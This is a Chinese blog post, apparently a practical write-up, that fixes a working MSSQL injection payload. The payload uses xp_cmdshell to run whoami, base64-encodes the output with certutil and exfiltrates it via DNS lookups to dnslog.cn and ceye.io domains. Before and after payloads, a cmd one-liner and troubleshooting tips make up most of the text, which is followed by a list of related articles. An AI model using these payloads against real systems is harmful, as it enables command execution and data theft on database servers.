MSSQL注入DNS带外问题解决

简介: MSSQL注入DNS带外问题解决

0x01 前言

朋友@Sin在“对某系统实战练手”这篇文章中看到这种MSSQL注入DNS带外数据的利用方式,但是他在本地复现时遇到了一些问题,所以找我帮着给测试一下,正好闲着没事就看了一下,并在解决这个问题后给他写了这篇记录文。


0x02 正文部分

我们先来看下原作者给出的DNS带外数据命令行版,可以直接执行并通过dnslog接收命令回显。继续来分析一下这条命令的参数和实现的功能吧,cmd参数说明如下。

  • /c:执行字符串指定的命令然后终止,
  • /v:使用 ! 作为分隔符启用延迟的环境变量。
cmd /v /c "whoami > temp && certutil -encode temp temp2 && findstr /L /V "CERTIFICATE" temp2 > temp3 && set /p MYVAR=< temp3 && set FINAL=!MYVAR!.xhwls9.dnslog.cn && nslookup !FINAL!"


1、执行whoami命令写入到temp文件中,并使用certutil命令进行base64编码到temp2文件。

    whoami > temp && certutil -encode temp temp2

    2、使用findstr命令在temp2文件中搜索不包含"CERTIFICATE"的行内容写入到temp3文件,/L参数:按字使用搜索字符串,/V参数:只打印不包含匹配的行。

      findstr /L /V "CERTIFICATE" temp2 > temp3

      3、MYVAR变量等于temp3文件内容,FINAL变量=MYVAR.DNSLOG,最后用nslookup命令执行FINAL:nslookup cGVudGVzdC13aW4xMFxzaGFkb3c5DQo=.xhwls9.dnslog.cn,没有nslookup命令时可用ping命令替代,执行这条命令时必须加上cmd的/v参数。

        set /p MYVAR=< temp3 && set FINAL=!MYVAR!.xhwls9.dnslog.cn && nslookup !FINAL!"


        使用原作者给出的MSSQL注入DNS带外数据Payoad时出现了下图中的报错,笔者根据这个报错进行了一系列的测试,最终修改出以下可执行Payload,可以自己去对比一下它们之间的差别在哪。


        修改之前:

          exec master..xp_cmdshell "whoami>C:\ProgramData\temp%26%26certutil -encode C:\ProgramData\temp C:\ProgramData\temp2%26%26findstr /L /V ""CERTIFICATE"" C:\ProgramData\temp2>C:\ProgramData\temp3";
          exec master..xp_cmdshell "cmd /v /c""set /p MYVAR=< C:\ProgramData\temp3 %26%26 set FINAL=!MYVAR!.xxx.ceye.io %26%26 ping !FINAL!""";
          exec master..xp_cmdshell "del ""C:\ProgramData\temp"" ""C:\ProgramData\temp2"" ""C:\ProgramData\temp3""";


          修改之后:

            exec master..xp_cmdshell 'whoami>C:\ProgramData\temp %26%26 certutil -encode C:\ProgramData\temp C:\ProgramData\temp1 %26%26 findstr /L /V "CERTIFICATE" C:\ProgramData\temp1>C:\ProgramData\temp2';
            exec master..xp_cmdshell "cmd /v /c""set /p MYVAR=< C:\ProgramData\temp2 %26%26 set FINAL=!MYVAR!.gnomur.dnslog.cn %26%26 ping !FINAL!""";
            exec master..xp_cmdshell 'del "C:\ProgramData\temp*"';


            0x03 注意事项


            1. CMD命令行下执行时直接用&&连接即可,而在URL提交时必须将&&用Urlencode进行编码;
            2. 出现“开头的 标识符 太长。最大长度为 128”报错时可尝试将最外边的双引号改为单引号;
            3. 第一条语句用findstr搜索"CERTIFICATE"字符串时必须用双引号,否则可能找不到指定字符;
            4. 第一条语句注意查看temp2内容是否正确,如果不正确或为内容为空时将无法带出相关数据;
            5. 第二条语句必须加上cmd的/v参数,否则可能即使不出现报错也无法带出相关数据;
            6. 第二条语句最外边的引号必须用双引号,单引号即使不出现报错也无法带出相关数据。


            相关文章
            |
            SQL 数据库 Python
            某站点存在SQL注入,直接可进行脱库(实战可参考此方法)
            某站点存在SQL注入,直接可进行脱库(实战可参考此方法)
            |
            SQL 安全 网络协议
            命令执行/SQL盲注无回显外带方式
            命令执行/SQL盲注无回显外带方式
            771 0
            |
            JavaScript
            vue中有关表格中的表格头中添加悬浮提示的ui问题
            vue中有关表格中的表格头中添加悬浮提示的ui问题
            635 1
            |
            人工智能 自然语言处理 程序员
            下载量突破400万,百万开发者首选的 AI 编码工具通义灵码是如何炼成的?
            下载量突破400万,百万开发者首选的 AI 编码工具通义灵码是如何炼成的?
            665 3
            |
            人工智能 关系型数据库 双11
            2024阿里云双11优惠活动开启,云服务器79元一年起,能领代金券和上云补贴金
            2024年阿里云双11优惠活动开启,云服务器低至79元一年起,涵盖云数据库、对象存储OSS、无影云电脑等产品,提供代金券、企业算力补贴及上云扶持金等多项优惠,助您轻松上云。
            |
            SQL 域名解析 编解码
            技术分享|Dnslog与Http外带
            技术分享|Dnslog与Http外带
            2375 0
            |
            安全 数据库连接 PHP
            中文版Pikachu web靶机平台搭建指南,英语小白的福音
            中文版Pikachu web靶机平台搭建指南,英语小白的福音
            1371 1
            |
            监控 安全 数据可视化
            化工厂人员定位系统解决方案,UWB定位系统源码
            通过融合UWB定位技术,实现室内外定位无缝切换、二三维地图呈现电子围栏、安全预警、位置追踪、轨边回放等功能,可实现化工企业精细化安全管理和生产过程管控,进一步提高生产效率,维护生产秩序的安全,同时也实现了化工企业安全管理和生产效率的提高。
            498 0
            |
            SQL 网络安全 PHP
            渗透测试-SQL注入之堆叠注入-攻防世界supersqli实战
            渗透测试-SQL注入之堆叠注入-攻防世界supersqli实战
            渗透测试-SQL注入之堆叠注入-攻防世界supersqli实战